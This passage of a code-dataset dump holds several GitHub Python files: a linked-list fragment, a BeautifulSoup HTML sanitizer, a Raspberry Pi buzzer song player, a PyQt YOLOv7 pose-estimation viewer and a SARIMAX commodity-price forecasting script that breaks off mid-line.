head.next\n","repo_name":"Long-yuyao/python-trailing","sub_path":"data_structure/linked_list/remove_duplicated2.py","file_name":"remove_duplicated2.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"7092946880","text":"# -*- coding: utf-8 -*-\n\nfrom bs4 import BeautifulSoup\nimport re\n\n\ndef __mapping_table():\n\td = {\n\t\t\"\": \"||[u]||\",\n\t\t\"\": \"||[/u]||\",\n\t\t\"\": \"||[b]||\",\n\t\t\"\": \"||[/b]||\",\n\t\t\"\": \"||[i]||\",\n\t\t\"\": \"||[/i]||\",\n\t\t\"
\": \"||[br/]||\",\n\t}\n\treturn d\n\ndef __encode_html_string(s):\n\td = __mapping_table()\n\tfor k, v in d.items():\n\t\ts = s.replace(k, v)\n\treturn s\n\ndef __decode_html_string(s):\n\td = __mapping_table()\n\tfor k, v in d.items():\n\t\ts = s.replace(v, k)\n\treturn s\n\ndef sanitize_html(html_str=\"\"):\n\tencoded_str = __encode_html_string(html_str)\n\tbs_str = BeautifulSoup(encoded_str, 'html.parser')\n\tbs_str = bs_str.getText()\n\tdecoded_str = __decode_html_string(bs_str)\n\treturn decoded_str\n\n","repo_name":"remaudcorentin-dev/python-simple-html-sanitize","sub_path":"simple_html_sanitizer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"7818528824","text":"import RPi.GPIO as gpio\nimport time\npiano = list([330, 262, 196, 262, 294, 392 ,1,1, 294, 330, 294, 196, 262])\nbuzzer = 16\ngpio.setmode(gpio.BCM)\ngpio.setup(buzzer, gpio.OUT)\n\ndef play(pitch, sec):\n half_pitch = (1 / pitch) / 4\n t = int(pitch * sec)\n for i in range(t):\n gpio.output(buzzer, gpio.HIGH)\n time.sleep(half_pitch)\n gpio.output(buzzer, gpio.LOW)\n time.sleep(half_pitch)\ndef playSong(): \n for p in piano:\n play(p, 1)\n\n#playSong()\n\n","repo_name":"skywind121/ePaper_project","sub_path":"code/song.py","file_name":"song.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"25192216891","text":"import sys\nimport cv2\nimport torch\nimport numpy as np\nfrom torchvision import transforms\nfrom utils.datasets import letterbox\nfrom utils.torch_utils import select_device\nfrom models.experimental import attempt_load\nfrom utils.general import non_max_suppression_kpt, strip_optimizer\nfrom utils.plots import colors, plot_one_box_kpt\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\n\nclass VideoWorker(QThread):\n changePixmap = pyqtSignal(QImage)\n\n def __init__(self, gui):\n super().__init__(gui)\n self.gui = gui\n self.stop_signal = False\n\n @torch.no_grad()\n def run(self):\n weights=\"yolov7-w6-pose.pt\"\n device = select_device(\"0\") #select device\n\n strip_optimizer(\"0\", \"yolov7-w6-pose.pt\")\n\n model = attempt_load(weights, map_location=device) #Load model\n model.eval()\n names = model.module.names if hasattr(model, \"module\") else model.names # get class names\n cap = cv2.VideoCapture(0) #pass video to videocapture object\n cap.set(cv2.CAP_PROP_FRAME_WIDTH, self.gui.cam_width)\n while True:\n ret, frame = cap.read() #get frame and success from video capture\n if ret is False: #if success is true, means frame exist\n break\n dst = cv2.resize(frame, dsize=(self.gui.cam_width, self.gui.cam_height), interpolation=cv2.INTER_AREA)\n inp = cv2.resize(frame, (640, int((640*self.gui.cam_height)/self.gui.cam_width)))\n inp = cv2.cvtColor(inp, cv2.COLOR_BGR2RGB) #convert frame to RGB\n inp = letterbox(inp, (self.gui.cam_width), stride=64, auto=True)[0]\n inp = transforms.ToTensor()(inp)\n inp = torch.tensor(np.array([inp.numpy()]))\n inp = inp.to(device) #convert inp data to device\n inp = inp.float() #convert inp to float precision (cpu)\n with torch.no_grad(): #get predictions\n output_data, _ = model(inp)\n output_data = non_max_suppression_kpt(\n output_data,\n 0.25, # Conf. 
Threshold.\n 0.65, # IoU Threshold.\n nc=model.yaml[\"nc\"], # Number of classes.\n nkpt=model.yaml[\"nkpt\"], # Number of keypoints.\n kpt_label=True)\n \n # for pose in output_data: # detections per img\n # for det_index, (*xyxy, conf, cls) in enumerate(reversed(pose[:,:6])): #loop over poses for drawing on frame\n # c = int(cls) # integer class\n # kpts = pose[det_index, 6:]\n # label = f\"{names[c]} {conf:.2f}\"\n # plot_one_box_kpt(xyxy, dst, label=label, color=colors(c, True), \n # line_thickness=6, kpt_label=True, kpts=kpts, steps=3, \n # orig_shape=dst.shape[:2])\n for det in output_data[0]:\n if det[4] < 0.5:\n continue\n for i in range(len(det)):\n if i in [6, 9, 12, 15, 18, 21, 24, 27, 30, 33, 36, 39, 42, 45, 48, 51, 54]:\n dst = cv2.circle(dst, (int(det[i]), int(det[i+1])), 3, (0, 255, 0), -1, cv2.LINE_AA)\n dst = cv2.putText(dst, \"{:.2f}\".format(det[i+2].item()), (int(det[i]+5), int(det[i+1]-4)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 1, cv2.LINE_AA)\n\n rgbImage = cv2.cvtColor(dst, cv2.COLOR_BGR2RGB)\n convertToQtFormat = QImage(rgbImage.data, rgbImage.shape[1], rgbImage.shape[0], QImage.Format_RGB888)\n p = convertToQtFormat.scaled(self.gui.cam_width, self.gui.cam_height, Qt.KeepAspectRatio)\n self.changePixmap.emit(p)\n \n if self.stop_signal:\n self.gui.label.setText(\"no image\")\n break\n cap.release()\n\nclass App(QWidget):\n def __init__(self):\n super().__init__()\n self.width = 1600\n self.height = 900\n self.cam_width = 1280\n self.cam_height = 720\n self.start()\n\n def start(self):\n self.setWindowTitle(\"ANGEL X\")\n self.move(0, 0)\n self.resize(self.width, self.height)\n\n self.cb = QComboBox(self)\n self.cb.addItem(\"구동기 모드 선택\")\n self.cb.addItem(\"Squat\")\n self.cb.addItem(\"Stoop\")\n self.cb.addItem(\"Heavy Load\")\n self.cb.activated[str].connect(self.onSelectChanged)\n self.cb.setStyleSheet(\"QComboBox { max-width:200px; }\")\n\n btn_rec = QPushButton(self)\n btn_rec.setText(\"REC\")\n btn_rec.setStyleSheet(\"QPushButton { max-width:100px; }\")\n self.btn_rec_state = False\n\n grid = QGridLayout()\n self.setLayout(grid)\n grid.addWidget(self.cb, 0, 0)\n grid.addWidget(btn_rec, 0, 1)\n btn_rec.clicked.connect(self.onRecClicked)\n\n self.label = QLabel(self)\n self.label.setText(\"no image\")\n self.label.resize(self.cam_width, self.cam_height)\n grid.addWidget(self.label, 1, 0, 1, 2)\n\n self.center()\n self.show()\n\n def onSelectChanged(self, text):\n pass\n\n def onRecClicked(self):\n if self.cb.currentText() == \"구동기 모드 선택\":\n QMessageBox.about(self, \"Error\", \"구동기 모드를 선택해주세요.\")\n return\n \n if self.btn_rec_state == True:\n self.btn_rec_state = False\n self.video_worker.stop_signal = True\n self.video_worker.quit()\n self.video_worker.wait(500)\n return\n\n self.btn_rec_state = True\n self.video_worker = VideoWorker(self)\n self.video_worker.changePixmap.connect(self.showImage)\n try:\n self.video_worker.start()\n except:\n self.video_worker.quit()\n self.video_worker.wait(500)\n\n def showImage(self, image):\n self.label.setPixmap(QPixmap.fromImage(image))\n\n\n def center(self):\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n ex = App()\n sys.exit(app.exec_())","repo_name":"hrdkdh/pose_estimation","sub_path":"dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":6309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} 
+{"seq_id":"5866966341","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 6 10:07:55 2020\r\n\r\n@author: hmusugu\r\n\"\"\"\r\n\r\n#SARIMA Modelling Univiate\r\n\r\n\r\nfrom datetime import datetime\r\nfrom openpyxl import load_workbook\r\nfrom dateutil.relativedelta import relativedelta\r\nimport warnings\r\nimport itertools\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nwarnings.filterwarnings(\"ignore\")\r\nplt.style.use('fivethirtyeight')\r\nimport pandas as pd\r\nimport statsmodels.api as sm\r\nfrom statsmodels.tsa.stattools import adfuller\r\nfrom statsmodels.tsa.stattools import kpss\r\nfrom sklearn import metrics\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.metrics import r2_score\r\nimport sqlalchemy as db\r\nfrom sqlalchemy import create_engine\r\nimport os\r\nfrom sqlalchemy import create_engine, MetaData\r\nimport StationarityTests\r\nimport StationarizeSeries\r\nfrom scipy.stats import pearsonr\r\nfrom scipy.stats import spearmanr\r\nfrom scipy.stats import kstest, shapiro\r\nfrom pandas import DataFrame\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.ensemble import ExtraTreesClassifier\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.feature_selection import RFE\r\nfrom matplotlib import pyplot\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\n\r\n#Importing input files\r\ndef import_files():\r\n df = pd.read_excel(\"Styrene_PS_Input_Data_20200914 v2.xlsx\", sheet_name=\"endog\", index_col = \"date\")\r\n exog_var = pd.read_excel(\"Styrene_PS_Input_Data_20200914 v2.xlsx\",sheet_name=\"exog\",index_col = \"date\")\r\n #full_data1 = exog_var.iloc[:52, 5:8]\r\n #df['date'] = pd.to_datetime(df['date'], errors='coerce')\r\n #df = df.asfreq(freq = 'B')\r\n #df = df.groupby(df.index).mean()\r\n return df, exog_var\r\n\r\n'''\r\n#Needs to be built-in\r\ndef train_test(index1,index2):\r\n #tra = df.iloc[0:31,index1:index2]\r\n #tes = df.iloc[30:36,index1:index2]\r\n ful = df.iloc[0:40,index1:index2]\r\n return ful\r\n'''\r\n#Stationarizer func to stationarize non-stationary exog variables\r\ndef Stationarizer(data1):\r\n data1 = data1.dropna()\r\n sTest = StationarityTests.StationarityTests()\r\n results2 = StationarityTests.RunTests(sTest, data1)\r\n \r\n nonStationaryData = False\r\n df_Stnry = pd.DataFrame()\r\n for k in results2.items():\r\n isStationary = False\r\n isStationaryADF = False\r\n isStationaryKPSS = False\r\n columns = k[1].items()\r\n for j in columns:\r\n testStats = j[1]\r\n for t in testStats:\r\n testType = t[0]\r\n if testType == 'ADF':\r\n isStationaryADF = t[1]\r\n elif testType == 'KPSS':\r\n isStationaryKPSS = t[1]\r\n elif testType == 'isStationary':\r\n isStationary = t[1]\r\n if not isStationary:\r\n df_Stnry[k[0]] = StationarizeSeries.differenceSeries(k[0], data1, sTest)\r\n nonStationaryData = True\r\n else:\r\n df_Stnry[k[0]] = data1[k[0]]\r\n return df_Stnry, nonStationaryData\r\n\r\n#Func for creating lag columns\r\ndef create_lagged_columns(df_Stnry,exog_name):\r\n # load dataset\r\n series = df_Stnry[exog_name]\r\n dataframe = DataFrame()\r\n for i in range(12,0,-1):\r\n \tdataframe['t-'+str(i)] = series.shift(i)\r\n dataframe['t'] = series.values\r\n dataframe = dataframe[12:]\r\n return dataframe\r\n\r\n#Correlation Tests (Pearson and Spearman)\r\ndef corr_tests(lag_columns,endog_var1):\r\n #Pearson\r\n p_coef = []\r\n for i1 in lag_columns.columns:\r\n corr, _ = pearsonr(endog_var1, lag_columns[i1])\r\n 
p_coef.append(corr)\r\n max_p_coef = max(p_coef)\r\n for i2 in range(len(p_coef)):\r\n if p_coef[i2] == max_p_coef:\r\n corr_column1 = lag_columns.columns[i2]\r\n \r\n #Spearman\r\n s_coef = []\r\n for i3 in lag_columns.columns:\r\n corr, _ = spearmanr(endog_var1, lag_columns[i3])\r\n s_coef.append(corr)\r\n max_s_coef = max(s_coef)\r\n for i4 in range(len(s_coef)):\r\n if s_coef[i4] == max_s_coef:\r\n corr_column2 = lag_columns.columns[i4]\r\n #Which column to take\r\n if corr_column1 == corr_column2:\r\n corr_column = corr_column1\r\n return corr_column\r\n else:\r\n if shapiro(lag_columns[corr_column1])[1]>0.05:\r\n return (corr_column1)\r\n else: return (corr_column2)\r\n\r\n\r\n\r\n#Feature Importance/ Feature Selection\r\ndef Random_Forest_regressor(df_ex_en):\r\n array = df_ex_en.values\r\n X = array[:,1:]\r\n y = array[:,0]\r\n \r\n model = RandomForestRegressor(n_estimators=500, random_state=1)\r\n model.fit(X, y)\r\n # show importance scores to choose components that explain 80% of variance \r\n # plot importance scores\r\n names = df_ex_en.columns.values[1:]\r\n ticks = [i for i in range(len(names))]\r\n pyplot.bar(ticks, model.feature_importances_)\r\n pyplot.xticks(ticks, names)\r\n pyplot.show()\r\n \r\n imp_col_dict = dict()\r\n for k3 in range(len(names)):\r\n imp_col_dict[names[k3]] = model.feature_importances_[k3]\r\n sort_orders = sorted(imp_col_dict.items(), key=lambda x: x[1], reverse=True)\r\n imp_col_name = []\r\n var_val = []\r\n for i in sort_orders:\r\n imp_col_name.append(i[0])\r\n var_val.append(i[1])\r\n \r\n imp_col_final = []\r\n c=0\r\n for k4 in range(len(var_val)):\r\n c = c + var_val[k4]\r\n imp_col_final.append(imp_col_name[k4])\r\n if c >=0.85:\r\n break\r\n else:\r\n continue\r\n \r\n return imp_col_final, var_val, imp_col_name\r\n\r\n \r\n \r\n#Func for uni-var training\r\ndef model(data):\r\n p = d = q = range(0, 2)\r\n pdq = list(itertools.product(p, d, q))\r\n seasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, d, q))]\r\n AIC = []\r\n PDQ=[]\r\n S_PDQ = []\r\n for param in pdq:\r\n for param_seasonal in seasonal_pdq:\r\n try:\r\n mod = sm.tsa.statespace.SARIMAX(endog = data,\r\n order=param,\r\n seasonal_order=param_seasonal,\r\n enforce_stationarity=False,\r\n enforce_invertibility=False)\r\n results = mod.fit()\r\n AIC.append(results.aic)\r\n PDQ.append(param)\r\n S_PDQ.append(param_seasonal)\r\n print('ARIMA{}x{}12 - AIC:{}'.format(param, param_seasonal, results.aic))\r\n except:\r\n continue\r\n #AIC = AIC\r\n min_AIC = min(AIC)\r\n for a1 in range(len(AIC)):\r\n if (AIC[a1]==min_AIC):\r\n min_index = a1\r\n \r\n opt_PDQ = PDQ[min_index]\r\n opt_S_PDQ = S_PDQ[min_index]\r\n p,d,q=opt_PDQ[0],opt_PDQ[1],opt_PDQ[2]\r\n P,D,Q=opt_S_PDQ[0],opt_S_PDQ[1],opt_S_PDQ[2]\r\n \r\n #def run_model(): '''Make sure to include time stamps so that we know the run-time'''\r\n mod = sm.tsa.statespace.SARIMAX(data,\r\n order=(p, d, q),\r\n seasonal_order=(P, D, Q, 12),enforce_stationarity=False,enforce_invertibility=False)\r\n res = mod.fit()\r\n print(res.summary().tables[1])\r\n return res\r\n\r\n\r\n#Func for multivariate training:\r\ndef mult_var_model(endog_data, exog_data):\r\n p = d = q = range(0, 2)\r\n pdq = list(itertools.product(p, d, q))\r\n seasonal_pdq = [(x[0], x[1], x[2], 12) for x in list(itertools.product(p, d, q))]\r\n \r\n AIC = []\r\n PDQ=[]\r\n S_PDQ = []\r\n for param in pdq:\r\n for param_seasonal in seasonal_pdq:\r\n try:\r\n mod = sm.tsa.statespace.SARIMAX(endog = endog_data,\r\n order=param,\r\n 
seasonal_order=param_seasonal,\r\n enforce_stationarity=True,\r\n enforce_invertibility=True, exog = exog_data)\r\n results = mod.fit()\r\n AIC.append(results.aic)\r\n PDQ.append(param)\r\n S_PDQ.append(param_seasonal)\r\n print('SARIMAX{}x{}12 - AIC:{}'.format(param, param_seasonal, results.aic))\r\n except:\r\n continue\r\n #Choosing model with min AIC\r\n min_AIC = min(AIC)\r\n for a1 in range(len(AIC)):\r\n if (AIC[a1]==min_AIC):\r\n min_index = a1\r\n \r\n opt_PDQ = PDQ[min_index]\r\n opt_S_PDQ = S_PDQ[min_index]\r\n return opt_PDQ,opt_S_PDQ\r\n\r\ndef run_mul_model(opt_pdqs,opt_S_PDQS,endog_data, exog_data):\r\n p,d,q=opt_pdqs[0],opt_pdqs[1],opt_pdqs[2]\r\n P,D,Q=opt_S_PDQS[0],opt_S_PDQS[1],opt_S_PDQS[2]\r\n model = sm.tsa.statespace.SARIMAX(endog_data,\r\n order=(p, d, q),\r\n seasonal_order=(P, D, Q, 12),enforce_stationarity=True,enforce_invertibility=True,exog = exog_data)\r\n res = model.fit()\r\n print(res.summary().tables[1])\r\n return res\r\n\r\n#Function to invert first order differencing\r\ndef inverter(diff_val,orig_data):\r\n inv = []\r\n c = orig_data.iloc[-len(diff_val)-1]\r\n for k6 in range(len(diff_val)):\r\n c = c + diff_val[k6]\r\n inv.append(c)\r\n return inv\r\n\r\n#Performance metrics\r\ndef forecast_accuracy(forecast, actual):\r\n mape = np.mean(np.abs(forecast - actual)/np.abs(actual)) # MAPE\r\n me = np.mean(forecast - actual) # ME\r\n mae = np.mean(np.abs(forecast - actual)) # MAE\r\n mpe = np.mean((forecast - actual)/actual) # MPE\r\n rmse = np.mean((forecast - actual)**2)**.5 # RMSE\r\n corr = np.corrcoef(forecast, actual)[0,1] # corr\r\n mins = np.amin(np.hstack([forecast[:,None], \r\n actual[:,None]]), axis=1)\r\n maxs = np.amax(np.hstack([forecast[:,None], \r\n actual[:,None]]), axis=1)\r\n minmax = 1 - np.mean(mins/maxs) # minmax\r\n return({'mape':mape, 'me':me, 'mae': mae, \r\n 'mpe': mpe, 'rmse':rmse, 'corr':corr, 'minmax':minmax})\r\n\r\n\r\ndef normalize(series):\r\n series = pd.DataFrame(series)\r\n values = series.values\r\n #values = values.reshape((len(values),np.shape(series)[1]))\r\n scaler = StandardScaler()\r\n scaler = scaler.fit(values)\r\n normalized = scaler.transform(values)\r\n inversed = scaler.inverse_transform(normalized)\r\n return inversed, normalized, scaler\r\n \r\n\r\n \r\n\r\n\r\n#Main\r\n \r\n#Import data\r\ndf_endog, df_exog= import_files()\r\n\r\n\r\n\r\n\r\n#Need to Make this generic for all material types***********************************\r\ndf_type_endog = dict(tuple(df_endog.groupby('material')))\r\ndf_type_exog = dict(tuple(df_exog.groupby('material')))\r\ntyp_list =tuple(df_endog.groupby('material'))\r\n\r\n\r\nendog_type_dict = {}\r\nfor number in range(len(df_type_endog)):\r\n endog_type_dict[\"endog_typ%s\" %number] = df_type_endog[typ_list[number][0]]\r\n\r\nexog_type_dict = {}\r\nfor number in range(len(df_type_exog)):\r\n exog_type_dict[\"exog_typ%s\" %number] = df_type_exog[typ_list[number][0]]\r\n\r\n\r\nout_df_list = []\r\nout_df_list1 = []\r\nperf_list = []\r\nfor q1 in range(len(endog_type_dict)):\r\n for q2 in range(len(exog_type_dict)):\r\n if (list(endog_type_dict.keys())[0][-1] == list(exog_type_dict.keys())[0][-1]):\r\n endog_typ = endog_type_dict[list(endog_type_dict.keys())[1]]\r\n exog_typ = exog_type_dict[list(exog_type_dict.keys())[1]]\r\n exog_typ= exog_typ.dropna(axis=1, how='all')\r\n exog_typ = exog_typ.drop(['material', 'year','month'], axis = 1)\r\n exog_typ = exog_typ.dropna()\r\n exog_backup = exog_typ\r\n \r\n endog_var = endog_typ['cost_per_unit'].dropna()\r\n # Normalize Endog \r\n 
endog_orig, endog_norm, sca_endog = normalize(endog_var)\r\n \r\n endog_var = pd.DataFrame(endog_var)\r\n endog_var['cost_per_unit'] = endog_norm\r\n endog_var = endog_var.T.iloc[0]\r\n \r\n # Normalize Exog \r\n exog_orig, exog_norm, sca_exog = normalize(exog_typ)\r\n \r\n #exog_var = pd.DataFrame(exog_var)\r\n \r\n exog_typ1 = pd.DataFrame(exog_norm)\r\n exog_typ1.index = exog_typ.index\r\n exog_typ1.columns = exog_typ.columns\r\n exog_typ = exog_typ1\r\n \r\n #Stationarizing Endog\r\n endog_var_df = endog_var.to_frame()\r\n endog_stationarized,nonStationaryData = Stationarizer(endog_var_df)\r\n endog_final = endog_stationarized['cost_per_unit']['2017-02-01':]\r\n \r\n #Stationarize exog\r\n df_stationarized, nonStationaryData = Stationarizer(exog_typ)\r\n df_stationarized = df_stationarized.dropna()\r\n\r\n #Taking optimal lag columns using Pearson and Spearmen Co-eff. \r\n selected_lag_col = []\r\n exog_final1 = pd.DataFrame()\r\n for k1 in df_stationarized.columns:\r\n print (k1)\r\n df_lagged_columns = create_lagged_columns(df_stationarized, k1)\r\n df_lagged_columns = df_lagged_columns[:'2020-08-01']\r\n #selected_lag_col.append(k1+'_'+corr_tests(df_lagged_columns,endog_final))\r\n lag_name = corr_tests(df_lagged_columns,endog_final)\r\n exog_final1[k1+'_'+corr_tests(df_lagged_columns,endog_final)] = df_lagged_columns[lag_name]\r\n \r\n df_ex_en1 = pd.DataFrame()\r\n df_ex_en1['cost_per_unit'] = endog_final\r\n for k2 in exog_final1.columns:\r\n df_ex_en1[k2] = exog_final1[k2] \r\n #df_typ2 = df_type['Styr[]ene']\r\n \r\n #Taking columns selected by Feature Selection \r\n feature_selected_col, var_val, col_name = Random_Forest_regressor(df_ex_en1)\r\n exog_final2 = pd.DataFrame()\r\n for k5 in feature_selected_col:\r\n exog_final2[k5] = df_ex_en1[k5]\r\n \r\n #Storing color for selected columns:\r\n clean_col_name = []\r\n for m2 in range(len(col_name)):\r\n clean_col_name.append(col_name[m2][:col_name[m2].find('_')]) \r\n color = []\r\n for m1 in col_name:\r\n if m1 in feature_selected_col:\r\n color.append('green')\r\n else:color.append('red')\r\n \r\n #Dataframe for feature Selection Criterion\r\n fs = pd.DataFrame()\r\n fs['Index Type'] = clean_col_name\r\n fs['Variance'] = var_val\r\n fs['color'] = color\r\n \r\n \r\n #Forecasting exogs with optimal lags using univariate analysis\r\n res_dict = dict()\r\n for k7 in exog_final2.columns:\r\n res_dict['res_'+k7] = model(exog_final2[k7])\r\n \r\n pred_uni_exog =pd.DataFrame()\r\n for k8 in range(len(res_dict)):\r\n pred_uni_exog[list(res_dict.keys())[k8][4:]] = list(res_dict.values())[k8].forecast(14)\r\n \r\n #Creating exog_old to normalize it so that we can de-normalize the array with selected columns\r\n exog_old = pd.DataFrame()\r\n #original data with selected columns\r\n for s1 in range(len(exog_final2.columns)):\r\n exog_old[exog_final2.columns[s1][:exog_final2.columns[s1].find('_')]] = exog_backup[exog_final2.columns[s1][:exog_final2.columns[s1].find('_')]]\r\n \r\n #normalizing exog_old\r\n exog_orig_old, exog_norm_old, sca_exog_old = normalize(exog_old)\r\n \r\n #Adding column names and index to exog_old\r\n exog_old1 = pd.DataFrame(exog_norm_old)\r\n exog_old1.index = exog_old.index\r\n exog_old1.columns = exog_old.columns\r\n exog_old = exog_old1\r\n \r\n \r\n #Forecasting orginal exogs using univariate analysis (Needs to refined)************************************\r\n res_dict2 = dict()\r\n for k9 in exog_old.columns:\r\n res_dict2['res_'+k9] = model(exog_old[k9])\r\n #exog forecasts\r\n pred_uni_exog2 
=pd.DataFrame()\r\n for k10 in range(len(res_dict)):\r\n pred_uni_exog2[list(res_dict2.keys())[k10][4:]] = list(res_dict2.values())[k10].forecast(14)\r\n \r\n \r\n #de-normalizing\r\n pred_uni_exog_norm = sca_exog_old.inverse_transform(pred_uni_exog2.values)\r\n pred_uni_exog_norm= pd.DataFrame(pred_uni_exog_norm)\r\n pred_uni_exog_norm.index = pred_uni_exog2.index\r\n pred_uni_exog_norm.columns = pred_uni_exog2.columns\r\n pred_uni_exog2 = pred_uni_exog_norm\r\n \r\n #x = sca_exog.inverse_transform(pred_uni_exog2.values)\r\n \r\n \r\n #exog in-samp predictions\r\n pred_uni_exog_insamp =pd.DataFrame()\r\n for k10 in range(len(res_dict)):\r\n pred_uni_exog_insamp[list(res_dict2.keys())[k10][4:]] = list(res_dict2.values())[k10].predict(start=pd.to_datetime('2016-01-01'), dynamic=False) #Starting date of exog_tup\r\n # Filling 1st values with orig values\r\n for k11 in exog_old.columns:\r\n pred_uni_exog_insamp[k11][0] = exog_old[k11][0]\r\n \r\n #de-normalizing\r\n pred_uni_exog_insamp_norm = sca_exog_old.inverse_transform(pred_uni_exog_insamp.values)\r\n pred_uni_exog_insamp_norm= pd.DataFrame(pred_uni_exog_insamp_norm)\r\n pred_uni_exog_insamp_norm.index = pred_uni_exog_insamp.index\r\n pred_uni_exog_insamp_norm.columns = pred_uni_exog_insamp.columns\r\n pred_uni_exog_insamp = pred_uni_exog_insamp_norm\r\n \r\n \r\n exog_typ2 = pd.DataFrame(exog_orig_old)\r\n exog_typ2.index = exog_old.index\r\n exog_typ2.columns = exog_old.columns\r\n exog_typ = exog_typ2\r\n \r\n \r\n out_df_list2 = []\r\n for k12 in exog_typ.columns:\r\n output_df2 = pd.DataFrame()\r\n output_df2['Index_price'] = exog_typ[k12]\r\n output_df2['Adjusted_Index_price'] = pred_uni_exog_insamp[k12]\r\n \r\n forecast_df2 = pd.DataFrame()\r\n forecast_df2['Forecasted_Index_price'] = pred_uni_exog2[k12]\r\n \r\n out2 = pd.concat([output_df2,forecast_df2])\r\n out2['Forecasted_Index_price'][output_df2.index[-1]] = output_df2['Adjusted_Index_price'][output_df2.index[-1]]\r\n out2['Material Type'] = endog_typ['material'][0]\r\n out2['Index Type'] = k12\r\n \r\n out_df_list2.append(out2)\r\n \r\n exog_price_forecasts = pd.DataFrame()\r\n exog_price_forecasts = pd.concat(out_df_list2)\r\n \r\n out_df_list1.append(exog_price_forecasts)\r\n \r\n #Split data train, test and future. 
Needs to be made generic******************************\r\n en_train = endog_final[:'2019-09-01']\r\n ex_train = exog_final2[:'2019-09-01']\r\n \r\n en_test = endog_final['2019-10-01':]\r\n ex_test = exog_final2['2019-10-01':]\r\n \r\n ex_fut = pred_uni_exog\r\n \r\n #Train model on train data\r\n pdq_tra, PDQ1_tra = mult_var_model(en_train, ex_train)\r\n \r\n res_tra = run_mul_model(pdq_tra, PDQ1_tra, en_train, ex_train)\r\n \r\n #Out-of-sample predictions and Model Performance Evaluation (using test data)\r\n pred_test = res_tra.predict(start=res_tra.nobs, end=res_tra.nobs + (len(ex_test)-1), exog = ex_test, dynamic = True) \r\n \r\n pred_test_inv = inverter(pred_test, endog_var)\r\n en_test_inv = inverter(en_test, endog_var)\r\n \r\n pred_test_inv = np.array(pred_test_inv)\r\n en_test_inv = np.array(en_test_inv)\r\n \r\n \r\n #de-normalizing\r\n pred_test_inv = sca_endog.inverse_transform(pred_test_inv)\r\n en_test_inv = sca_endog.inverse_transform(en_test_inv)\r\n \r\n \r\n perf_metrics=forecast_accuracy(pred_test_inv, en_test_inv)\r\n perf = pd.DataFrame(perf_metrics, index = range(0,1))\r\n perf['Material Type'] = endog_typ['material'][0]\r\n \r\n perf_list.append(perf)\r\n \r\n \r\n plt.plot(pred_test_inv)\r\n plt.plot(en_test_inv)\r\n \r\n #Train model on Full data\r\n #res_ful, pdq,P_D_Q = mult_var_model(endog_final, exog_final2) \r\n res_ful = run_mul_model(pdq_tra, PDQ1_tra, endog_final, exog_final2)\r\n #In-sample predictions:\r\n #pred1 = res_ful.get_prediction(start=pd.to_datetime('2017-02-01'), dynamic=False) #2nd date from endog start\r\n #pred1.conf_int()\r\n pred1 = res_ful.predict(start=pd.to_datetime('2017-02-01'), exog = exog_final2, dynamic=False) \r\n pred_in_samp = pred1 #( originally pred1.predicted )\r\n\r\n \r\n pred_in_samp_inv= []\r\n var_c1 = endog_var.iloc[-1]\r\n for k10 in range(len(pred_in_samp)):\r\n var_c1 = var_c1 + pred_in_samp[k10]\r\n pred_in_samp_inv.append(var_c1)\r\n \r\n \r\n pred_in_samp_inv = [endog_var[0]] + pred_in_samp_inv\r\n pred_in_samp_inv = sca_endog.inverse_transform(pred_in_samp_inv)\r\n #Out-of-sample predictions\r\n pred_fut = res_ful.predict(start=res_ful.nobs, end=res_ful.nobs + (len(ex_fut)-1), exog = ex_fut, dynamic = False) \r\n \r\n pred_fut_inv= []\r\n var_c = endog_var.iloc[-1]\r\n for k9 in range(len(pred_fut)):\r\n var_c = var_c + pred_fut[k9]\r\n pred_fut_inv.append(var_c)\r\n \r\n #denormalizing\r\n pred_fut_inv = sca_endog.inverse_transform(pred_fut_inv)\r\n \r\n plt.plot(pred_fut_inv)\r\n \r\n output_df = pd.DataFrame()\r\n output_df['Material Type']= endog_typ['material']\r\n #output_df.index = list(endog_typ.index) + fut_index[1:]\r\n #output_df['Commodity Adjusted Price'] = forecast_df['preds']\r\n output_df['Commodity Price'] = endog_typ['cost_per_unit']\r\n output_df['Adjusted Commodity Price'] = pd.Series(pred_in_samp_inv, index = output_df.index)\r\n \r\n #output_df['Commodity Adjusted Price']['2019-04-01':] = pred_fut_inv\r\n \r\n fut_index=[]\r\n for q3 in range(15):\r\n fut_index.append(endog_typ.index[-1]+ relativedelta(months=+q3))\r\n \r\n forecast_df = pd.DataFrame()\r\n forecast_df['Forecasted Commodity Price'] = pred_fut_inv\r\n forecast_df['Material Type'] = endog_typ['material'][0]\r\n forecast_df.index= fut_index[1:]\r\n \r\n out1 = pd.concat([output_df, forecast_df])\r\n out1['Forecasted Commodity Price'][endog_typ.index[-1]] = endog_typ['cost_per_unit'][endog_typ.index[-1]]\r\n out_df_list.append(out1)\r\n\r\npath = 
